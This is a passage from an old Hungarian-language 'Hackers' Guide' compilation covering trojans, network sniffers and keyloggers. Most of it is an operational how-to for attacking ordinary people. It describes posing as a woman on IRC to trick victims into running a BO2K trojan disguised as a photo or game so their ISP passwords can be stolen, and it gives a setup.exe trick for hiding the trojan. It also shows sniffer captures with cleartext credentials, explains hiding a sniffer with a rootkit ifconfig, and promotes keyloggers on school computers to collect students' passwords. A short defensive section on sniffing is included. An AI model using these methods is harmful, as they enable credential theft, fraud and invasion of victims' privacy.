keresztül trojai szerveréhez csatlakozol és vele kommunikálsz, nem pedig<br />

közvetlenül a géppel, egyszerubben csak azokat az utasításokat adhatod ki, amiket a<br />

trojai is tartalmaz. Az áldozat gépén a trojai úgy viselkedik, mint egy vírus, mert ez is<br />

memóriarezidens. Többféle képpen muxik az önindítás. Egyrészt beírják magukat a<br />

Windows könyvtárban található win.ini illetve system.ini fájlban vagy pedig a windows<br />

regisztrációs adatbázisába piszkítanak. Nehány trojannal (pl. ICQHack, ICQSpy stb.)<br />

akár a vonal másik végén lévo egyén ICQ UIN számát, azonosító kódját,<br />

kapcsolatainak listáját, az összes fogadott és küldött üzenet megismerhetjük. A<br />

hozzáértobbek teljes pusztítást is képesek végrehajtani ezekkel a vírusokra hasonlító<br />

programokkal. Néhány buta ember azt hiszi, hogy a hacker szinte semmihez nem tud<br />

hozzáférni egy kapcsolódás után, pedig ez nem így van. Egy profi támadás<br />

következtében szinte minden fontos személyes infót meg lehet szerezni, ami csak a<br />

számítógépen van, mitpéldául:<br />

96<br />

• Bankkártya információkat<br />

• Banki információkat<br />

• Azonosítási információkat<br />

• Levelezolistákat<br />

• Azonosítókat és kódokat<br />

• Személyes címet és adatokat<br />

• E-mail fiókokat<br />

• Otthoni iroda / Kisvállalokozás információit<br />

• Vállalati azonosítókat ezálltal különbözo szolgáltatásokhoz hozzáférést<br />

• Személyes e-mail levelekbe beletekintést<br />

• Te és családtagjaid vezeték és utónevét<br />

• Gyerekeid nevét és életkorát<br />

• Otthoni címedet<br />

• Telefonszámodat<br />

• Leveleket, amiket te másoknak írtál pl. Wordben


• Családi képeidet<br />

• Iskolai munkákat<br />

• Más iskolai azonosítót / információt<br />

Hackers’ Guide<br />

Szerintem nem örülnél, ha valaki betörne hozzád és személyes dolgaidat internetes<br />

oldalakon keresztül közölné másokkal.<br />

Minden nap megszállott tempóban készítik a programozók az újabb, jobb, több<br />

funkciós, jobb rejtozködo technikájú trojai programokat és ezzel egyidoben készülnek<br />

az ellenszerek (anti-trojan) is. Muszakilag a trojai programok minden operációs<br />

rendszer illetve platform alatt képesek muködni. Biztos információ soha sincs a<br />

trojanokról, hogy mennyi van belolük, mennyien vannak megfertozve stb. stb... Csak<br />

egy biztos, az, hogy érdemes védekezni, ha nem akarunk a dokumentumban leírtak<br />

szerint pórul járni és persze a legjobb védekezés a támadás, Hannibált is saját<br />

módszereiven gyozték le Zámánál!<br />

************************************************************************************************<br />

Pár szó a trojai programokról<br />

A neve a történelemből fakad. Pár évvel ez elött a görögök ajándékba adtak egy<br />

falovat az ellenségnek, amiben benne lapult a sok rohambilis. Éjjel mikor senki sem<br />

figyelt, kijöttek és átvették az irányitást. Nnna.....ezek a programok valami hasonlóra<br />

képesek (persze megfelelő védelem hiányában). Van egy server és egy client része.<br />

Ha valakinél Te is át akarod venni az irányitást, akkor futtatnod kell a servert. Ezeket<br />

át lehet nevezni, és az ikon is valamilyen rendszer fájlra hasonlit. A windows futása<br />

közben nem lehet törőlni őket, mert alkalmazásban vannak. Léteznek olyan trojaik,<br />

amik a server installálása után a megadott cimre kűldenek e-mailt az áldozat ip-je és<br />

egyéb fontos info-val együtt. Ha megvan az ip, akkor azt ird be a cliens-be, és<br />

kapcsolodj rá. Ha nem sikerűl, azt látni fogod. Ha rajta vagy, onnan tied a világ.<br />

Tudsz törőlni; bármit fel-le tölteni; kikapcsolni gépet, monitort; programokat leállitanielinditani;<br />

hátteret változtatni; felszavakat lopni; egeret manipulálni; FTP-n<br />

kapcsolodni; böngészőt elirányitani és ez csak a töredéke amire ezek képesek. DE<br />

megfelelő védelemmel, letudod ütni magadról a támadást, sőt még detektálni is lehet<br />

a támadót. A működési elvük, hogy elinditás után bizonyos portokat megnyitnak és<br />

azok a kapcsolódásra várnak. Néhány trojan ujra inditja a gépet, de az újak már a<br />

registry-t használják.<br />

Hogyan használjuk EREDMÉNYESEN a trojai programokat?<br />

A leghasznosabb számunkra a 'system/list passwords' opció ... ez kiírja a<br />

számítógépen tárolt jelszókat, így a minket érdeklő internet-hozzáférés<br />

"username/password" - jét is. A dolognak egyetlen szépséghibája van ... a szerver<br />

file-t valahogy fel kell juttatnuk a célgépre: ez kétféleképpen tehetjük meg, az<br />

97


Hackers’ Guide<br />

egyszerubb, ha fizikai hozzáférésünk van a géphez, mondjuk ez véleményem szerint<br />

elég ritka. A másik lehetoség interneten, leginkább irc-en keresztül 'rávenni'<br />

áldozatunkat, hogy vegye át a file-t, és futtassa le :) Itt jön a dologba egy kis<br />

nehézség ... ki az a hülye, aki bármit is elindít a gépén anélkül, hogy tudná, mi az.<br />

Meg kell nyugodni, vannak ilyenek. Az elso lépés az, hogy felmegyünk ircre. A<br />

legfontosabb az, hogy noi néven!!! :) Valami igencsak jó nore utaló nevet kell<br />

választani (pl. Niki vagy valami ilyesmi). Aztán következik egy kelloen lamer csatorna<br />

kiválasztása, tehát nem valami hack-channel, hanem pl #magyar, #hungary ... ahol<br />

biztos vannak olyanok akik beszívnak egy ilyet ... Ezután ne csináljuk semmit! Ne<br />

beszéljünk, ne /msg - zünk senkivel! Nem kell sokat várni (max 1 perc), és alig bírjuk<br />

majd bezárni az msg ablakokat :) A sok kanos tag csak úgy eláraszt a kampó<br />

kérdésekkel (pl. Szia, hogy vagy? Szeretsz baszni? - meg ilyenek). Válasszunk ki<br />

egyet, akinek a hostja az általunk preferált ISP-jé, pl dial31.kamponet.hu, ha a<br />

kamponetre akarunk accountot. Ekkor kezdjünk el vele pofázni. Lényeg az, hogy ne<br />

derüljön ki, hogy fasz van a lábunk között ... :) A leendo accountunkról<br />

érdeklodhetünk az alábbi kérdéssel: - Gyakran vagy itt? VAGY - Minden nap itt<br />

vagy? innen megtudjuk, hogy korlátlan - e az account. Beszélgessünk egy kicsit,<br />

aztán amikor képet kér rólad (biztos fog!), dcc-zük el pl. a kep.rar filet, ami<br />

tartalmazza a bo2k sever file-t, átnevezett állapotban pl. kep.exe-re (a server file<br />

114K). Átveszi, lefuttatja, és két eset lehetséges: kitömörítés után vagy elkezd<br />

kurvaanyázni - ekkor a vírusírtója (pl AVP monitor) beszólt, hogy bo2k veszély van ...<br />

általában azonban nem tudják az emberek mi ez, csak azt hiszik valami vírus. Ekkor<br />

fontos, hogy ne azt mondjuk, hogy 'bazzeg nem szívtad be', hanem valami olyasmit,<br />

hogy 'majd szólok a bátyámnak hogy szerelje meg' :) vagy valami hasonlót ... kérjünk<br />

bocsánatot, meg minden, és ha lehet pofázzunk még vele. Jobbik estet (mármint<br />

számunkra nyero), ha elindítja, és azt mondja, hogy 'nem muködik'. Ekkor nekünk<br />

kurvára jó, mert felkonnektelünk a gépére, és simán lenyúljuk a jelszó(ka)t. Ezek<br />

után is beszélgessünk még vele, mert így egyáltálán nem lesz feltunő. Bármilyen<br />

nagy a kísértés, NE rebootoljunk neki, én már párszor megtettem, és a paraszt<br />

miután visszajött beszólt nem msg-be a csatin, hogy mi a helyzet, valaki szívózik :)<br />

Általam gyakrabban alkalmazott módszer, hogy nem képnek adom ki a server file-t.<br />

(ha képet kérnek azt mondom, hogy 'nincs a számítógépen' - ez nagyon 'lányosan'<br />

hangzik ... :)) Kis beszélgetés után (kb 5 perc) térjünk rá a lényegre, kérdezzük meg<br />

tole, hogy van-e kedve sakkozni, amobázni, vagy amit akarunk ... ha azt mondja,<br />

hogy igen, csak hogyan, mondjuk azt eloször, hogy 'interneten keresztül' - ez szinén<br />

elég picsásan hangzik. NAGYON fontos, hogy kérdezzük meg, hogy megvan-e neki<br />

a játék! (ez egy kurva jó kérdés, bazzeg!!!) Így minden gyanúja elszáll, hogy szivatni<br />

akarjuk. Persze nincs meg nekik, tehát ajánljuk fel, hogy elküld- jük :) ... Ekkor ugyan<br />

az a 2 eset áll fenn, mint a képesnél, ezt nem írom le mégegyszer. Szintén ha nem<br />

megy nekik, beszélgessünk még utána ...Ha elég ügyesek vagyunk és jól csináljuk,<br />

egy hétvége délután (ekkor iszonyú sok lamer vann benn, tehát jobb, mint az este)<br />

mondjuk 3 tól 7ig körülbelül 15 accot tudunk szerezni ... nem is rossz!! Mindig nézzük<br />

meg az online eltöltött idot a szolgáltató oldalán, innen megtudjuk (az elozo<br />

hónapiból, mondjuk) hogy hány órás az acc. Én csak a végteleneket használtam,<br />

nem vagyok paraszt, hogy mások fizessenek az én szórakozásomért ... :) tehát csak<br />

ezeket használd. Minden nap másikat!!! Így viszonylag elkerülöd a lebukás<br />

lehetoségét is.Ha valami olyan szolgáltatóra szereztünk accountot, ami a mi<br />

körzetünkben még nem épült ki (foleg vidékiek, mint pl. én), akkor keressünk egy<br />

olyan valakit, aki ott lakik, ahol már ott van az isp, és ha neki is van pár elfekvo accja,<br />

ami meg neki nem kell, akkor el lehet csere-berélni is oket.Ha sikerült valami<br />

98


Hackers’ Guide<br />

korlátlan hozzáférést szerezni, nézzük meg, hátha pl. csak hétvégén vannak bent<br />

vele, így hétköznap nyugodtan használhatjuk.Fontos még megjegyeznem, hogy én<br />

ezt már nem csinálom, csak régebben, amikor még nem volt legal accountom. Ha<br />

kipróbáljátok, semmilyen felelosséget NEM vállalok, viszont saját tapasztalatból<br />

tudom, hogy az emberek kb 60%a szívja be. Lehet próbálkozni ...<br />

from ww187 / rBL2k<br />

A kérdes adott: hogy hogyan juttasunk fel egy trojan<br />

szervert a target gépre. Irc-n nehéz elsózni. Ha a progi<br />

amit lekűldesz nem csinal semmit, akkor a lámma gyanakodhat.<br />

Itt jon a trükk.<br />

Kepzeld el a játek directory-t.<br />

van benne egy pár .dat .dll akármijen file, meg egy<br />

setup.exe nevű is.<br />

Átnevezed a trojan szerver-t mongyuk akarmi.dll -nek, és a<br />

játekprogram .exe -t pedig valami.dat -nak<br />

Szoval a setup.exe azt csinalja, hogy ezt a<br />

két fajlt visszanevezi exe -nek, aztán futtatja a trojant,<br />

majd közli hogy az installacio sikeres volt, és rákérdez<br />

hogy futtatod-e a játekot.<br />

Ha igen, akkor elinditja a játekot, vagy mindegy mit, mert<br />

akkor már régen a gépen van a lényeg, és abszolut nem tűnik<br />

fel neki semmi.<br />

Hacsak nem nyögi be valami virusirtó, vagy akármi, hogy gáz van...:)<br />

Quentin0<br />

************************************************************************************************<br />

Snifferek<br />

Némi bevezető…<br />

Érdemes ezekről a programokról is írni egy keveset, mivel a legtöbb tömeges accszerzést<br />

ennek segítségével hajtották végre (pl. legutóbb az (első) L&R törésnél,<br />

ahol a kb. 2500 password-öt néhány hét sniffelés eredményeként kapták).<br />

A miatt is érdemes beszélnünk róla, mivel a sniffelést kívülről nem lehet detektálni,<br />

így azoknak a kezdőknek is bátran ajánlható, akik nem akarnak mazochista módon<br />

rögtön a rendszergazdi karmaiba kerülni :( (de erről később).<br />

99


Hackers’ Guide<br />

Mik is a snifferek?<br />

Ha a szó angol jelentését megkeressük, akkor minden világos lesz:<br />

sniff = szippantás, szimatolás<br />

(Itt most nem arra kell gondolni, hogy ha használjuk, akkor jól megszippantjuk,<br />

inkább koncentráljunk a második jelentésre, azaz szimatolás.)<br />

A snifferek olyan programok (de lehet hardware is), amelyekkel a hálózaton folyó<br />

forgalomba szimatolhatunk bele. Ez olyan hálózaton lehetséges, ahol a hálózatba<br />

kötött gépek egy fizikai vonalon osztoznak., ahol a vonalra feltett info bárki számára<br />

fizikailag elérhető. Ennek remek példája pl. az Ethernet hálózat.<br />

Az Ethernet ui. úgy működik, hogy a hálózatba kötött gépek az adatokat nem egy<br />

darabban, hanem csomagokra bontva (frame-ek) küldik el egymásnak. A drótra<br />

feltett adatcsomagokat minden Ethernet-kártya mintavételezi, és ha valamelyik<br />

kártya ráismer a saját fizikai címére az adott csomagban akkor beolvassa és<br />

továbbítja az őt meghajtó programoknak (talán emlékeztek 7 rétegű OSI modellre).<br />

De szerencsére át lehet a hálózati interface-t állítani olyan üzemmódra, hogy<br />

válogatás nélkül minden csomagot beolvasson, ezt a 'Promiscuous mode'. (A<br />

promiszkuitás szó azt hiszem mindenkinek ismerős :)).<br />

Ezzel a beállítással elvileg az Etherneten folyó teljes adatforgalom lehallgatható.<br />

Felhasználás<br />

Ezt a funkciót nyilván nem arra a célra hagyták az Ethernet hálózatban bárki kedvére<br />

garázdálkodjon, hanem elsősorban diagnosztikai célból. Lehet a hálózati forgalmat<br />

mérni vele, vagy hálózati hibakeresésre is használható. De előszeretettel használják<br />

a rendszergazdik olyan csúnya, gonosz módszerek :) kiderítésére, mint pl. a<br />

spoofolás.<br />

A sniffelés az Etherneten kívül más hálózatokon is lehetséges, tetszőleges hálózati<br />

protokollt figyelhetünk vele, de én most csak az Ethernet és a TCP/IP sniffelés<br />

ismertetésére szorítkozom (a többit nem ismerem annyira, nem mintha ezt hű de<br />

nagyon ismerném).<br />

Mi kell hozzá?<br />

- 1 Ethernet hálózat, amihez fizikailag hozzákapcsolódtunk<br />

- 1 saját IP cím, ami ehhez a hálózathoz tartozik<br />

- Nem árt egy jó sniffer program sem (írhatunk is egyet, ha van elég önbizalmunk).<br />

- Jó sniffer programot én csak UNIX-ra láttam, úgyhogy valamilyen LINUX + gcc<br />

fordító<br />

- Root jog ezen a Linuxon, a PROMISC mód bekapcsolásához.<br />

A sniffereket végrehajtható program formájában vagy forráskódban tölthetjük le<br />

(személy szerint a forráskódút preferálom, szeretem tudni, hogy mit csinálok).<br />

Futtatáskor találkozhatunk néhány problémával. A sniffer mintavételezi a hálózatot.<br />

Gyors vagy terhelt hálózaton nem várhatjuk azt, hogy a sniffer az összes hálózati<br />

csomagot képes lesz begyűjteni nekünk, mivel a beolvasott csomagok feldolgozása<br />

is időt igényel, és ez alatt a hálózaton folyik a forgalom. Másrészt a begyűjtött<br />

csomagok nagy mennyisége miatt a tárolás és értelmezés sem mindig egyszerű.<br />

Egy sniffer akkor jó, ha a beolvasott csomagokat képes szűrni. TCP/IP hálózatban az<br />

IP csomagokat a forrás és cél IP-cím alapján érdemes szűrni. Ha ezek TCP (vagy<br />

UDP) csomagok, akkor még érdemes a TCP-kapcsolat forrás és cél portcímét is<br />

100


Hackers’ Guide<br />

figyelembe venni. Ha password-szerzésre specializáljuk a sniffert, akkor további<br />

finomítás lehet az, ha csak a kapcsolat első néhány első csomagját tároljuk (pl. a<br />

linsniffer ezt teszi). Így csökkenthető a tárolt adatok mennyisége.<br />

A snifferek kimenete általában a standard kimenetre megy de file (ok)ba is kérhetjük<br />

az eredményt. A szűrés mellett a logolási szint beállíthatósága is fontos lehet. A<br />

snifferek általánban kiírják az elkapott csomagok header-infoját olvasható formára<br />

alakítva, (IP, TCP, UDP header), és a csomagokban szállított adatokat is.<br />

Néhány példa:<br />

-----------------------------------------------------------------------------------------------<br />

1 . Már nem is tudom melyik sniffer (talán Sniffit 0.3.5 ???; próbáljátok ki az összeset<br />

:( ):<br />

TCP Packet ID (from_IP.port-to_IP.port): 192.168.66.1.513-192.168.66.66.1023<br />

SEQ (hex): 19B24FC4 ACK (hex): 223EE67F<br />

FLAGS: -AP--- Window: 3C00<br />

Packet ID (from_IP.port-to_IP.port): 192.168.66.1.513-192.168.66.66.1023<br />

45 E 10 . 00 . 29 ) 29 ) B7 . 40 @ 00 . 3F ? 06 . 0C . 74 t C0 . A8 . 42 B 01 .<br />

C0 . A8 . 42 B 42 B 02 . 01 . 03 . FF . 19 . B2 . 4F O C4 . 22 " 3E > E6 . 7F .<br />

50 P 18 . 3C < 00 . F6 . 02 . 00 . 00 . 00 .<br />

TCP Packet ID (from_IP.port-to_IP.port): 192.168.66.66.1023-192.168.66.1.513<br />

SEQ (hex): 223EE67F ACK (hex): 19B24FC1<br />

FLAGS: -AP--- Window: 7C00<br />

Packet ID (from_IP.port-to_IP.port): 192.168.66.66.1023-192.168.66.1.513<br />

45 E 00 . 00 . 34 4 31 1 01 . 00 . 00 . 45 E 06 . 3F ? 2F / C0 . A8 . 42 B 42 B<br />

C0 . A8 . 42 B 01 . 03 . FF . 02 . 01 . 22 " 3E > E6 . 7F . 19 . B2 . 4F O C1 .<br />

50 P 18 . 7C | 00 . 42 B 1E . 00 . 00 . FF . FF . 73 s 73 s 00 . 19 . 00 . 50 P<br />

00 . 00 . 00 . 00 .<br />

TCP Packet ID (from_IP.port-to_IP.port): 192.168.66.1.513-192.168.66.66.1023<br />

SEQ (hex): 19B24FC5 ACK (hex): 223EE68B<br />

FLAGS: -A---- Window: 3C00<br />

Packet ID (from_IP.port-to_IP.port): 192.168.66.1.513-192.168.66.66.1023<br />

45 E 10 . 00 . 28 ( 29 ) B8 . 40 @ 00 . 3F ? 06 . 0C . 74 t C0 . A8 . 42 B 01 .<br />

C0 . A8 . 42 B 42 B 02 . 01 . 03 . FF . 19 . B2 . 4F O C5 . 22 " 3E > E6 . 8B .<br />

50 P 10 . 3C < 00 . F5 . FE . 00 . 00 .<br />

-----------------------------------------------------------------------------------------------<br />

2. Pálda password megszerzésére:<br />

snoop from Sun<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1030<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1030 [1] 2977\r\ncs:/user/f<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1030<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />

101


Hackers’ Guide<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 \r\n\r\nUNIX(r) System V<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />

Itt jön a felhasználó (calvin), az echozás miatt duplán.<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 c<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 c<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 a<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 a<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 l<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 l<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 v<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 v<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 i<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 i<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 n<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 n<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />

… na és a password<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 Password:<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 T<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 i<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 g<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 e<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 r<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 7<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />

102


Hackers’ Guide<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 =<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188 $<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />

cs -> pc_rhee.sookmyung.ac.kr TELNET R port=1188 Last login: Mon Aug<br />

pc_rhee.sookmyung.ac.kr -> cs TELNET C port=1188<br />

…. satöbbi<br />

3. sniffit for UNIX<br />

203.252.195.1.110-203.252.195.191.1297<br />

203.252.195.1.20-203.252.195.2.1034<br />

203.252.195.1.20-203.252.195.2.1035<br />

203.252.195.1.21-203.252.195.2.1033<br />

203.252.195.1.23-203.252.195.2.1032<br />

203.252.195.1.23-203.252.195.65.1030<br />

203.252.195.191.1297-203.252.195.1.110<br />

203.252.195.2.1032-203.252.195.1.23<br />

203.252.195.2.1033-203.252.195.1.21<br />

203.252.195.2.1034-203.252.195.1.20<br />

203.252.195.2.1035-203.252.195.1.20<br />

203.252.195.65.1030-203.252.195.1.23<br />

cs# more 2*<br />

::::::::::::::<br />

203.252.195.1.110-203.252.195.191.1297<br />

::::::::::::::<br />

+OK QUALCOMM Pop server derived from UCB (version 2.1.4-R3) at cs starting.<br />

+OK Password required for hrshin.<br />

+OK hrshin has 0 message(s) (0 octets).<br />

+OK 0 0<br />

+OK Pop server at cs signing off.<br />

::::::::::::::<br />

203.252.195.191.1297-203.252.195.1.110<br />

::::::::::::::<br />

USER hrshin<br />

PASS shr1234<br />

STAT<br />

QUIT<br />

::::::::::::::<br />

203.252.195.1.21-203.252.195.2.1033<br />

::::::::::::::<br />

220 cs FTP server (UNIX(r) System V Release 4.0) ready.<br />

331 Password required for rhee.<br />

230 User rhee logged in.<br />

200 PORT command successful.<br />

150 ASCII data connection for /bin/ls (203.252.195.2,1034) (0 bytes).<br />

103


Hackers’ Guide<br />

226 ASCII Transfer complete.<br />

200 PORT command successful.<br />

150 ASCII data connection for certcc-msg (203.252.195.2,1035) (764 bytes).<br />

::::::::::::::<br />

203.252.195.2.1033-203.252.195.1.21<br />

::::::::::::::<br />

USER rhee


szintig<br />

- az elkapott csomagok kapcsolatok szerinti rendezése file-okba<br />

Hackers’ Guide<br />

Még nincs készen teljesen, de ha jól viselkedtek, akkor valamikor később ezt is<br />

elérhetővé teszem. További ötleteket szívesen fogadok.<br />

Detektálhatóság<br />

Már az elején írtam, hogy a sniffereket melegen (nem kell rosszra gondolni :))<br />

ajánlhatom kezdőknek, mivel ha saját gépen futtatják, akkor ez kívülről nem vehető<br />

észre. A sniffer ugyanis csak gyűjti a csomagokat a hálózatról, a hálózat felé<br />

semmilyen kimenete nincs. Így annak a gépnek a kivételével, ahol futtatjuk, más<br />

gépen semmiféle log nem keletkezik.<br />

Persze más a helyzet, ha valamilyem más módszerrel már bejutottunk egy olyan<br />

gépre, amit snifferrel nem érhetünk el (másik fizikai hálón van), megvan a root, de a<br />

saját hálóján lévő többi gépre is be szeretnénk jutni. Ekkor az egyik legegyszerűbb<br />

módszer egy sniffer telepítése. Ekkor azonban már észrevehetnek bennünket.<br />

A sniffer PROMISC módba nyomja hálózati interface-t, és ezt egyszerű észlelni, pl<br />

ifconfig-gal:<br />

#ifconfig le0<br />

le0:<br />

flags=8863<br />

inet 127.0.0.1 netmask 0xffffff00 broadcast 255.0.0.1<br />

Megoldás lehet, ha lecseréljük az ifconfig-ot (valamilyen Rootkit-ben lehet ilyeneket<br />

találni).<br />

CSAK ÉSSZEL EZZEL A MEGOLDÁSSAL !!! Minden normális helyen a rendszerfileokat<br />

CRC-vel szokás védeni !!!<br />

Ha nem vigyázunk a megfelelő szűrésre, vérszemet kapunk és minden csomagot<br />

file-ba írunk, akkor a winchy hamar megtelik, és ez még a legbénább<br />

rendszergazdinak is feltűnhet.<br />

Elárulhat az is, hogy ha a winchy többet jár a kelleténél, így állandóan villog a<br />

winchy-LED. Ennek a problémának a kezelésére nem tudok értelmes megoldást :).<br />

Védekezés a snifferek ellen<br />

Hogy a mási oldalnak is adjunk némi esélyt, megemlítek néhány módszert arra, hogy<br />

hogyan védekezhetünk a sniffelés ellen:<br />

- Aktív (Smart) HUB-ok alkalmazása: itt minden gép egy HUB-on keresztül<br />

kapcsolódik a másikhoz (csillag). A HUB az egyes ágakra csak azokat a csomagokat<br />

küldi el, amelyek az adott ághoz kötött gépnek szólnak. Ekkor maximum csak a saját<br />

gépünket sniffelhetnénk, de ez meg kit érdekel :( ?<br />

- Titkosított protokollok alkalmazása: pl. SSH, itt minden adat a vonalra kerül, de egy<br />

titkosított csatornán keresztül. Az elkapott csomagok olvashatatlanok.<br />

- S/Key vagy One Time Password technika alkalmazása: az első esetben a kliens<br />

ismeri a passwordöt, de nem ez kerül a vonalra, hanem egy frissen generált kulcsot<br />

kap a kliens a szervertől, ezzel megbuzerálja a beütött passwordot, és ezt küldi a<br />

105


Hackers’ Guide<br />

szervernek el.<br />

A One Time Password használatoakor a kliens egy password-listát kap, amelyen<br />

egyszer használatos password-ök vannak. Meg lehet sniffelni, de semmi értelme :(((.<br />

Néhány sniffer<br />

Itt most felsorolok néhány programot, linket sajnos nem tudok mellékelni, de<br />

megtalálásuk nem jelenthet problémát.<br />

Platform Sniffer<br />

4.3/4.4 BSD tcpdump<br />

FreeBSD tcpdump<br />

NetBSD tcpdump<br />

DEC UNIX tcpdump<br />

DEC Ultrix tcpdump<br />

HP/UX nettl (monitor) & netfmt (display)<br />

swatch<br />

Irix swatch<br />

Herman<br />

SunOS herfind<br />

swatch<br />

Solaris snoop<br />

SGI Irix nfswatch<br />

Etherman<br />

Linux tcpdump<br />

linsniffer<br />

spy-sniff<br />

Macintosh Etherpeek<br />

DOS ETHLOAD<br />

The Gobbler<br />

LanPatrol<br />

LanWatch<br />

Netmon<br />

Netwatch<br />

Netzhack<br />

A Sniffit-et nem írtam sehová, de az ott elérhető, ahol a libpcap csomag megvan.<br />

Itt van 2 ql sniffer/forrás<br />

tcpdump-3_4 éssniffit_0_3_5<br />

néhány sniffer forrás<br />

Szomorú búcsú …<br />

Mára ennyit a technika és a tudmány világából …<br />

Az általam leírtakkal senkit nem akartam arra buzdítani, hogy az itt ismertetett<br />

programokat és módszereket rossz szándékú célra használja (az, hogy mi a 'rossz<br />

szándék', annak eldöntését rátok bízom :)), célom az információ szabad áramlásának<br />

biztosítása.<br />

Ötleteket, hozzászólásokat szívesen fogadok:<br />

106


BowMan<br />

Hackers’ Guide<br />

************************************************************************************************<br />

Keyloggerekről általában<br />

Van aki azt se tudja, hogy mi és van aki nap mint nap használja... Ez a cikk szeretné<br />

számotokra a keyloggerek által nyújtott lehetőségeket bemutatni a Stealth Keyboard<br />

Interceptor Pro 4.00-on keresztül... Tehet sok sikert és minnél több keylogot gyüjteni,<br />

hisz az információ hatalom :-))<br />

1. Mi is az a keylogger?<br />

Összedobta: Nestan [FCF]<br />

Ahogyan a nevében is benne van loggolja, azaz eltárolja a billentyűzet által közölt<br />

adatokat. Elég nagy a választék a keyloggerek terén és ez nem számít vírusnak mint<br />

a trojaiak... Persze ezt neked a lamer gépére személyesen kell feltenned vagy ha<br />

ügyeskedtél valamelyik trojaival akkor feltöltöd a vinyójára és beüzemeled, persze<br />

már van néhány olyan torjan program ami alapban tartalmazza ezt a funkciót...<br />

2. Mire használhatom ezeket a programokat?<br />

Mindenre! Nagyon jó, hogy elterjedt a magyar középiskolákban a SuliNet-es internet<br />

hozzáférés és a diákok nagyrésze mindíg ott ül a gépek előtt. A lamerek<br />

nagytöbbsége, akik egy percig keresik, hogy hol az ESC gomb legtöbbször a<br />

Freemail-es illetve más ingyenes e-mail szolgáltatós postafiókjukat innen nézik...<br />

Persze, hogy a memóriarezidens keylogger autómatikusan menti és neked nincs<br />

más dolgod mint a géped jól eldugott log fájlokat átmásold lemezre és otthon<br />

részletesen átböngészd.<br />

3. Hogy is működnek ezek a programok?<br />

Nagyjából úgy mint egy vírus, mármint memóriarezidens programok. Te egyszerűen<br />

felmásolod vagy a jobb keyloggereknél feltelepíted, beállítod a kódot, hogy mások ne<br />

macerálják és tiéd a hatalom :-) A keyloggerek minden indítást regisztrálnak és igény<br />

szerint dátumoznak. Az én kollégiumomban kb. egy hónapig volt fent a Skin98...<br />

Ennek az lett a vége, hogy az internetező diákok mindegyikének tudtam a kódját...<br />

3. Minden kezdet nehéz...<br />

